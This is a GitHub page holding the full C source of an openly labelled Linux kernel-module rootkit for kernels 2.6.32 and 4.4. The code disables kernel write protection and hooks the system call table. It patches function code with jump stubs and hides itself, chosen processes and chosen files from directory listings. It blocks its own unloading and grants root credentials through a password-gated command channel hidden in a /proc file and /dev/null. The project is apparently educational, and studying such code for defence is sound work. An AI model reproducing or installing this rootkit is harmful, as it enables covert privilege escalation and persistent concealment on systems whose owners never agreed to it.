-
-
Notifications
You must be signed in to change notification settings - Fork 202
/
rootkit.c
1001 lines (766 loc) · 25.1 KB
/
rootkit.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
/*
* Copyright (C) 2016-2019 Maxim Biro <nurupo.contributions@gmail.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*/
#include <asm/unistd.h>
#include <linux/cred.h>
#include <linux/fs.h>
#include <linux/init.h>
#include <linux/kallsyms.h>
#include <linux/kernel.h>
#include <linux/kobject.h>
#include <linux/list.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/rbtree.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/sysfs.h>
#include <linux/uaccess.h>
#include <linux/unistd.h>
#include <linux/version.h>
#include <linux/limits.h>
#include <linux/delay.h>
#include <linux/version.h>
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 4, 0) && \
LINUX_VERSION_CODE < KERNEL_VERSION(4, 5, 0)
// Copy-pasted from Linux sources as it's not provided in public headers
// of newer Linux.
// Might differ from one version of Linux kernel to another, so update as
// necessary.
// http://lxr.free-electrons.com/source/fs/proc/internal.h?v=4.4#L31
struct proc_dir_entry {
unsigned int low_ino;
umode_t mode;
nlink_t nlink;
kuid_t uid;
kgid_t gid;
loff_t size;
const struct inode_operations *proc_iops;
const struct file_operations *proc_fops;
struct proc_dir_entry *parent;
struct rb_root subdir;
struct rb_node subdir_node;
void *data;
atomic_t count; /* use count */
atomic_t in_use; /* number of callers into module in progress; */
/* negative -> it's going away RSN */
struct completion *pde_unload_completion;
struct list_head pde_openers; /* who did ->open, but not ->release */
spinlock_t pde_unload_lock; /* proc_fops checks and pde_users bumps */
u8 namelen;
char name[];
};
#endif
#include "config.h"
#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Maxim Biro <nurupo.contributions@gmail.com>");
#define ARCH_ERROR_MESSAGE "Only i386 and x86_64 architectures are supported! " \
"It should be easy to port to new architectures though"
#define DISABLE_W_PROTECTED_MEMORY \
do { \
preempt_disable(); \
write_cr0(read_cr0() & (~ 0x10000)); \
} while (0);
#define ENABLE_W_PROTECTED_MEMORY \
do { \
preempt_enable(); \
write_cr0(read_cr0() | 0x10000); \
} while (0);
// ========== SYS_CALL_TABLE ==========
#if defined __i386__
#define START_ADDRESS 0xc0000000
#define END_ADDRESS 0xd0000000
#elif defined __x86_64__
#define START_ADDRESS 0xffffffff81000000
#define END_ADDRESS 0xffffffffa2000000
#else
#error ARCH_ERROR_MESSAGE
#endif
void **sys_call_table;
/**
* Finds a system call table based on a heruistic.
* Note that the heruistic is not ideal, so it might find a memory region that
* looks like a system call table but is not actually a system call table, but
* it seems to work all the time on my systems.
*
* @return system call table on success, NULL on failure.
*/
void **find_syscall_table(void)
{
void **sctable;
void *i = (void*) START_ADDRESS;
while (i < END_ADDRESS) {
sctable = (void **) i;
// sadly only sys_close seems to be exported -- we can't check against more system calls
if (sctable[__NR_close] == (void *) sys_close) {
size_t j;
// we expect there to be at least 300 system calls
const unsigned int SYS_CALL_NUM = 300;
// sanity check: no function pointer in the system call table should be NULL
for (j = 0; j < SYS_CALL_NUM; j ++) {
if (sctable[j] == NULL) {
// this is not a system call table
goto skip;
}
}
return sctable;
}
skip:
;
i += sizeof(void *);
}
return NULL;
}
// ========== END SYS_CALL_TABLE ==========
// ========== HOOK LIST ==========
struct hook {
void *original_function;
void *modified_function;
void **modified_at_address;
struct list_head list;
};
LIST_HEAD(hook_list);
/**
* Replaces a function pointer at some address with a new function pointer,
* keeping record of the original function pointer so that it could be
* restored later.
*
* @param modified_at_address Pointer to the address of where the function
* pointer that we want to replace is stored. The same address would be used
* when restoring the original funcion pointer back, so make sure it doesn't
* become invalid by the time you try to restore it back.
*
* @param modified_function Function pointer that we want to replace the
* original function pointer with.
*
* @return true on success, false on failure.
*/
int hook_create(void **modified_at_address, void *modified_function)
{
struct hook *h = kmalloc(sizeof(struct hook), GFP_KERNEL);
if (!h) {
return 0;
}
h->modified_at_address = modified_at_address;
h->modified_function = modified_function;
list_add(&h->list, &hook_list);
DISABLE_W_PROTECTED_MEMORY
h->original_function = xchg(modified_at_address, modified_function);
ENABLE_W_PROTECTED_MEMORY
return 1;
}
/**
* Get original function pointer based on the one we overwrote it with.
* Useful when wanting to call the original function inside a hook.
*
* @param modified_function The function that overwrote the original one.
* @return original function pointer on success, NULL on failure.
*/
void *hook_get_original(void *modified_function)
{
void *original_function = NULL;
struct hook *h;
list_for_each_entry(h, &hook_list, list) {
if (h->modified_function == modified_function) {
original_function = h->original_function;
break;
}
}
return original_function;
}
/**
* Removes all hook records, restores the overwritten function pointers to
* their original value.
*/
void hook_remove_all(void)
{
struct hook *h, *tmp;
// make it so that instead of `modified_function` the `original_function`
// would get called again
list_for_each_entry(h, &hook_list, list) {
DISABLE_W_PROTECTED_MEMORY
*h->modified_at_address = h->original_function;
ENABLE_W_PROTECTED_MEMORY
}
// a hack to let the changes made by the loop above propagate, as some
// process might be in the middle of executing our `modified_function`
// which calls the original function inside by getting it from the
// `hook_get_original()` call, which would return NULL if we `list_del()`
// everything, and, well, bad things happen if you try to use NULL as a
// function pointer and call into it.
// to get around this issue we:
// 1. make it so that instead of `modified_function` the
// `original_function` would get called. this is done above.
// 2. sleep hopefully long enough to let all the proesses that are in the
// middle of running `modified_function` to finish running that function
// 3. finally, remove all the elements from the list
msleep(10);
list_for_each_entry_safe(h, tmp, &hook_list, list) {
list_del(&h->list);
kfree(h);
}
}
// ========== END HOOK LIST ==========
// ========== HOOK EXAMPLES ==========
unsigned long read_count = 0;
asmlinkage long read(unsigned int fd, char __user *buf, size_t count)
{
read_count ++;
asmlinkage long (*original_read)(unsigned int, char __user *, size_t);
original_read = hook_get_original(read);
return original_read(fd, buf, count);
}
unsigned long write_count = 0;
asmlinkage long write(unsigned int fd, const char __user *buf, size_t count)
{
write_count ++;
asmlinkage long (*original_write)(unsigned int, const char __user *, size_t);
original_write = hook_get_original(write);
return original_write(fd, buf, count);
}
// ========== END HOOK EXAMPLES ==========
// ========== ASM HOOK LIST ==========
#if defined __i386__
// push 0x00000000, ret
#define ASM_HOOK_CODE "\x68\x00\x00\x00\x00\xc3"
// byte offset to where to the 0x00000000, to overwrite it with a function pointer
#define ASM_HOOK_CODE_OFFSET 1
// alternativly we could do `mov eax 0x00000000, jmp eax`, but it's a byte longer
//#define ASM_HOOK_CODE "\xb8\x00\x00\x00\x00\xff\xe0"
#elif defined __x86_64__
// there is no push that pushes a 64-bit immidiate in x86_64,
// so we do things a bit differently:
// mov rax 0x0000000000000000, jmp rax
#define ASM_HOOK_CODE "\x48\xb8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xe0"
// byte offset to where to the 0x0000000000000000, to overwrite it with a function pointer
#define ASM_HOOK_CODE_OFFSET 2
#else
#error ARCH_ERROR_MESSAGE
#endif
struct asm_hook {
void *original_function;
void *modified_function;
char original_asm[sizeof(ASM_HOOK_CODE)-1];
struct list_head list;
};
LIST_HEAD(asm_hook_list);
/**
* Patches machine code of the original function to call another function.
* This function should not be called directly.
*/
void _asm_hook_patch(struct asm_hook *h)
{
DISABLE_W_PROTECTED_MEMORY
memcpy(h->original_function, ASM_HOOK_CODE, sizeof(ASM_HOOK_CODE)-1);
*(void **)&((char *)h->original_function)[ASM_HOOK_CODE_OFFSET] = h->modified_function;
ENABLE_W_PROTECTED_MEMORY
}
/**
* Patches machine code of a function so that it would call our function.
* Keeps record of the original function and its machine code so that it could
* be unpatched and patched again later.
*
* @param original_function Function to patch
*
* @param modified_function Function that should be called
*
* @return true on success, false on failure.
*/
int asm_hook_create(void *original_function, void *modified_function)
{
struct asm_hook *h = kmalloc(sizeof(struct asm_hook), GFP_KERNEL);
if (!h) {
return 0;
}
h->original_function = original_function;
h->modified_function = modified_function;
memcpy(h->original_asm, original_function, sizeof(ASM_HOOK_CODE)-1);
list_add(&h->list, &asm_hook_list);
_asm_hook_patch(h);
return 1;
}
/**
* Patches the original function to call the modified function again.
*
* @param modified_function Function that the original function was patched to
* call in asm_hook_create().
*/
void asm_hook_patch(void *modified_function)
{
struct asm_hook *h;
list_for_each_entry(h, &asm_hook_list, list) {
if (h->modified_function == modified_function) {
_asm_hook_patch(h);
break;
}
}
}
/**
* Unpatches machine code of the original function, so that it wouldn't call
* our function anymore.
* This function should not be called directly.
*/
void _asm_hook_unpatch(struct asm_hook *h)
{
DISABLE_W_PROTECTED_MEMORY
memcpy(h->original_function, h->original_asm, sizeof(ASM_HOOK_CODE)-1);
ENABLE_W_PROTECTED_MEMORY
}
/**
* Unpatches machine code of the original function, so that it wouldn't call
* our function anymore.
*
* @param modified_function Function that the original function was patched to
* call in asm_hook_create().
*/
void *asm_hook_unpatch(void *modified_function)
{
void *original_function = NULL;
struct asm_hook *h;
list_for_each_entry(h, &asm_hook_list, list) {
if (h->modified_function == modified_function) {
_asm_hook_unpatch(h);
original_function = h->original_function;
break;
}
}
return original_function;
}
/**
* Removes all hook records, unpatches all functions.
*/
void asm_hook_remove_all(void)
{
struct asm_hook *h, *tmp;
list_for_each_entry_safe(h, tmp, &asm_hook_list, list) {
_asm_hook_unpatch(h);
list_del(&h->list);
kfree(h);
}
}
// ========== END ASM HOOK LIST ==========
// ========== ASM HOOK EXAMPLES ==========
unsigned long asm_rmdir_count = 0;
asmlinkage long asm_rmdir(const char __user *pathname)
{
asm_rmdir_count ++;
asmlinkage long (*original_rmdir)(const char __user *);
original_rmdir = asm_hook_unpatch(asm_rmdir);
long ret = original_rmdir(pathname);
asm_hook_patch(asm_rmdir);
return ret;
}
// ========== END ASM HOOK EXAMPLES ==========
// ========== PID LIST ==========
struct pid_entry {
unsigned long pid;
struct list_head list;
};
LIST_HEAD(pid_list);
int pid_add(const char *pid)
{
struct pid_entry *p = kmalloc(sizeof(struct pid_entry), GFP_KERNEL);
if (!p) {
return 0;
}
p->pid = simple_strtoul(pid, NULL, 10);
list_add(&p->list, &pid_list);
return 1;
}
void pid_remove(const char *pid)
{
struct pid_entry *p, *tmp;
unsigned long pid_num = simple_strtoul(pid, NULL, 10);
list_for_each_entry_safe(p, tmp, &pid_list, list) {
if (p->pid == pid_num) {
list_del(&p->list);
kfree(p);
break;
}
}
}
void pid_remove_all(void)
{
struct pid_entry *p, *tmp;
list_for_each_entry_safe(p, tmp, &pid_list, list) {
list_del(&p->list);
kfree(p);
}
}
// ========== END PID LIST ==========
// ========== FILE LIST ==========
struct file_entry {
char *name;
struct list_head list;
};
LIST_HEAD(file_list);
int file_add(const char *name)
{
struct file_entry *f = kmalloc(sizeof(struct file_entry), GFP_KERNEL);
if (!f) {
return 0;
}
size_t name_len = strlen(name) + 1;
// sanity check as `name` could point to some garbage without null anywhere nearby
if (name_len -1 > NAME_MAX) {
kfree(f);
return 0;
}
f->name = kmalloc(name_len, GFP_KERNEL);
if (!f->name) {
kfree(f);
return 0;
}
strncpy(f->name, name, name_len);
list_add(&f->list, &file_list);
return 1;
}
void file_remove(const char *name)
{
struct file_entry *f, *tmp;
list_for_each_entry_safe(f, tmp, &file_list, list) {
if (strcmp(f->name, name) == 0) {
list_del(&f->list);
kfree(f->name);
kfree(f);
break;
}
}
}
void file_remove_all(void)
{
struct file_entry *f, *tmp;
list_for_each_entry_safe(f, tmp, &file_list, list) {
list_del(&f->list);
kfree(f->name);
kfree(f);
}
}
// ========== END FILE LIST ==========
// ========== HIDE ==========
struct list_head *module_list;
int is_hidden = 0;
void hide(void)
{
if (is_hidden) {
return;
}
module_list = THIS_MODULE->list.prev;
list_del(&THIS_MODULE->list);
is_hidden = 1;
}
void unhide(void)
{
if (!is_hidden) {
return;
}
list_add(&THIS_MODULE->list, module_list);
is_hidden = 0;
}
// ========== END HIDE ==========
// ========== PROTECT ==========
int is_protected = 0;
void protect(void)
{
if (is_protected) {
return;
}
try_module_get(THIS_MODULE);
is_protected = 1;
}
void unprotect(void)
{
if (!is_protected) {
return;
}
module_put(THIS_MODULE);
is_protected = 0;
}
// ========== END PROTECT ==========
// ========== READDIR ==========
struct file_operations *get_fop(const char *path)
{
struct file *file;
if ((file = filp_open(path, O_RDONLY, 0)) == NULL) {
return NULL;
}
struct file_operations *ret = (struct file_operations *) file->f_op;
filp_close(file, 0);
return ret;
}
// Macros to help reduce repeated code where only names differ.
// Decreses risk of "copy-paste & forgot to rename" error.
#define FILLDIR_START(NAME) \
filldir_t original_##NAME##_filldir; \
\
static int NAME##_filldir(void * context, const char *name, int namelen, loff_t offset, u64 ino, unsigned int d_type) \
{
#define FILLDIR_END(NAME) \
return original_##NAME##_filldir(context, name, namelen, offset, ino, d_type); \
}
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 4, 0) && \
LINUX_VERSION_CODE < KERNEL_VERSION(4, 5, 0)
#define READDIR(NAME) \
int NAME##_iterate(struct file *file, struct dir_context *context) \
{ \
original_##NAME##_filldir = context->actor; \
*((filldir_t*)&context->actor) = NAME##_filldir; \
\
int (*original_iterate)(struct file *, struct dir_context *); \
original_iterate = asm_hook_unpatch(NAME##_iterate); \
int ret = original_iterate(file, context); \
asm_hook_patch(NAME##_iterate); \
\
return ret; \
}
#elif LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 32)
#define READDIR(NAME) \
int NAME##_readdir(struct file *file, void *dirent, filldir_t filldir) \
{ \
original_##NAME##_filldir = filldir; \
\
int (*original_readdir)(struct file *, void *, filldir_t); \
original_readdir = asm_hook_unpatch(NAME##_readdir); \
int ret = original_readdir(file, dirent, NAME##_filldir); \
asm_hook_patch(NAME##_readdir); \
\
return ret; \
}
#else
//#error "Wrong Linux kernel version"
#endif
// Macros to actually use
#define READDIR_HOOK_START(NAME) FILLDIR_START(NAME)
#define READDIR_HOOK_END(NAME) FILLDIR_END(NAME) READDIR(NAME)
READDIR_HOOK_START(root)
struct file_entry *f;
list_for_each_entry(f, &file_list, list) {
if (strcmp(name, f->name) == 0) {
return 0;
}
}
READDIR_HOOK_END(root)
READDIR_HOOK_START(proc)
struct pid_entry *p;
list_for_each_entry(p, &pid_list, list) {
if (simple_strtoul(name, NULL, 10) == p->pid) {
return 0;
}
}
READDIR_HOOK_END(proc)
READDIR_HOOK_START(sys)
if (is_hidden && strcmp(name, KBUILD_MODNAME) == 0) {
return 0;
}
READDIR_HOOK_END(sys)
#undef FILLDIR_START
#undef FILLDIR_END
#undef READDIR
#undef READDIR_HOOK_START
#undef READDIR_HOOK_END
// ========== END READDIR ==========
int execute_command(const char __user *str, size_t length)
{
if (length <= sizeof(CFG_PASS) ||
strncmp(str, CFG_PASS, sizeof(CFG_PASS)) != 0) {
return 0;
}
pr_info("Password check passed\n");
// since the password matched, we assume the command following the password
// is in the valid format
str += sizeof(CFG_PASS);
if (strcmp(str, CFG_ROOT) == 0) {
pr_info("Got root command\n");
struct cred *creds = prepare_creds();
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 4, 0) && \
LINUX_VERSION_CODE < KERNEL_VERSION(4, 5, 0)
creds->uid.val = creds->euid.val = 0;
creds->gid.val = creds->egid.val = 0;
#elif LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 32)
creds->uid = creds->euid = 0;
creds->gid = creds->egid = 0;
#endif
commit_creds(creds);
} else if (strcmp(str, CFG_HIDE_PID) == 0) {
pr_info("Got hide pid command\n");
str += sizeof(CFG_HIDE_PID);
pid_add(str);
} else if (strcmp(str, CFG_UNHIDE_PID) == 0) {
pr_info("Got unhide pid command\n");
str += sizeof(CFG_UNHIDE_PID);
pid_remove(str);
} else if (strcmp(str, CFG_HIDE_FILE) == 0) {
pr_info("Got hide file command\n");
str += sizeof(CFG_HIDE_FILE);
file_add(str);
} else if (strcmp(str, CFG_UNHIDE_FILE) == 0) {
pr_info("Got unhide file command\n");
str += sizeof(CFG_UNHIDE_FILE);
file_remove(str);
} else if (strcmp(str, CFG_HIDE) == 0) {
pr_info("Got hide command\n");
hide();
} else if (strcmp(str, CFG_UNHIDE) == 0) {
pr_info("Got unhide command\n");
unhide();
} else if (strcmp(str, CFG_PROTECT) == 0) {
pr_info("Got protect command\n");
protect();
} else if (strcmp(str, CFG_UNPROTECT) == 0) {
pr_info("Got unprotect command\n");
unprotect();
} else {
pr_info("Got unknown command\n");
}
return 1;
}
// ========== COMM CHANNEL ==========
static ssize_t proc_fops_write(struct file *file, const char __user *buf_user, size_t count, loff_t *p)
{
if (execute_command(buf_user, count)) {
return count;
}
int (*original_write)(struct file *, const char __user *, size_t, loff_t *);
original_write = asm_hook_unpatch(proc_fops_write);
ssize_t ret = original_write(file, buf_user, count, p);
asm_hook_patch(proc_fops_write);
return ret;
}
static ssize_t proc_fops_read(struct file *file, char __user *buf_user, size_t count, loff_t *p)
{
execute_command(buf_user, count);
int (*original_read)(struct file *, char __user *, size_t, loff_t *);
original_read = asm_hook_unpatch(proc_fops_read);
ssize_t ret = original_read(file, buf_user, count, p);
asm_hook_patch(proc_fops_read);
return ret;
}
int setup_proc_comm_channel(void)
{
static const struct file_operations proc_file_fops = {0};
struct proc_dir_entry *proc_entry = proc_create("temporary", 0444, NULL, &proc_file_fops);
proc_entry = proc_entry->parent;
if (strcmp(proc_entry->name, "/proc") != 0) {
pr_info("Couldn't find \"/proc\" entry\n");
remove_proc_entry("temporary", NULL);
return 0;
}
remove_proc_entry("temporary", NULL);
struct file_operations *proc_fops = NULL;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 4, 0) && \
LINUX_VERSION_CODE < KERNEL_VERSION(4, 5, 0)
struct rb_node *entry = rb_first(&proc_entry->subdir);
while (entry) {
pr_info("Looking at \"/proc/%s\"\n", rb_entry(entry, struct proc_dir_entry, subdir_node)->name);
if (strcmp(rb_entry(entry, struct proc_dir_entry, subdir_node)->name, CFG_PROC_FILE) == 0) {
pr_info("Found \"/proc/%s\"\n", CFG_PROC_FILE);
proc_fops = (struct file_operations *) rb_entry(entry, struct proc_dir_entry, subdir_node)->proc_fops;
goto found;
}
entry = rb_next(entry);
}
#elif LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 32)
proc_entry = proc_entry->subdir;
while (proc_entry) {
pr_info("Looking at \"/proc/%s\"\n", proc_entry->name);
if (strcmp(proc_entry->name, CFG_PROC_FILE) == 0) {
pr_info("Found \"/proc/%s\"\n", CFG_PROC_FILE);
proc_fops = (struct file_operations *) proc_entry->proc_fops;
goto found;
}
proc_entry = proc_entry->next;
}
#endif
pr_info("Couldn't find \"/proc/%s\"\n", CFG_PROC_FILE);
return 0;
found:
;
if (proc_fops->write) {
asm_hook_create(proc_fops->write, proc_fops_write);
}
if (proc_fops->read) {
asm_hook_create(proc_fops->read, proc_fops_read);
}
if (!proc_fops->read && !proc_fops->write) {
pr_info("\"/proc/%s\" has no write nor read function set\n", CFG_PROC_FILE);
return 0;
}
return 1;
}
static ssize_t devnull_fops_write(struct file *file, const char __user *buf_user, size_t count, loff_t *p)
{
if (execute_command(buf_user, count)) {
return count;
}
int (*original_write)(struct file *, const char __user *, size_t, loff_t *);
original_write = hook_get_original(devnull_fops_write);
return original_write(file, buf_user, count, p);
}
int setup_devnull_comm_channel(void)
{
hook_create(&get_fop("/dev/null")->write, devnull_fops_write);
return 1;
}
// ========== END COMM CHANNEL ==========
int init(void)
{
pr_info("Module loaded\n");
hide();
protect();
if (!setup_proc_comm_channel()) {
pr_info("Failed to set up comm channel\n");
unprotect();
unhide();
return -1;
}
pr_info("Comm channel is set up\n");
#if LINUX_VERSION_CODE >= KERNEL_VERSION(4, 4, 0) && \
LINUX_VERSION_CODE < KERNEL_VERSION(4, 5, 0)
asm_hook_create(get_fop("/")->iterate, root_iterate);
asm_hook_create(get_fop("/proc")->iterate, proc_iterate);
asm_hook_create(get_fop("/sys")->iterate, sys_iterate);
#elif LINUX_VERSION_CODE == KERNEL_VERSION(2, 6, 32)
asm_hook_create(get_fop("/")->readdir, root_readdir);
asm_hook_create(get_fop("/proc")->readdir, proc_readdir);
asm_hook_create(get_fop("/sys")->readdir, sys_readdir);
#endif
sys_call_table = find_syscall_table();
pr_info("Found sys_call_table at %p\n", sys_call_table);
// Setup the example hooks
asm_hook_create(sys_call_table[__NR_rmdir], asm_rmdir);
hook_create(&sys_call_table[__NR_read], read);
hook_create(&sys_call_table[__NR_write], write);
return 0;
}
void exit(void)
{
// Print the results of the example hooks
pr_info("sys_rmdir was called %lu times\n", asm_rmdir_count);
pr_info("sys_read was called %lu times\n", read_count);
pr_info("sys_write was called %lu times\n", write_count);
// Cleanup
hook_remove_all();
asm_hook_remove_all();
pid_remove_all();
file_remove_all();
THIS_MODULE->name[0] = 0;
pr_info("Module removed\n");
}
module_init(init);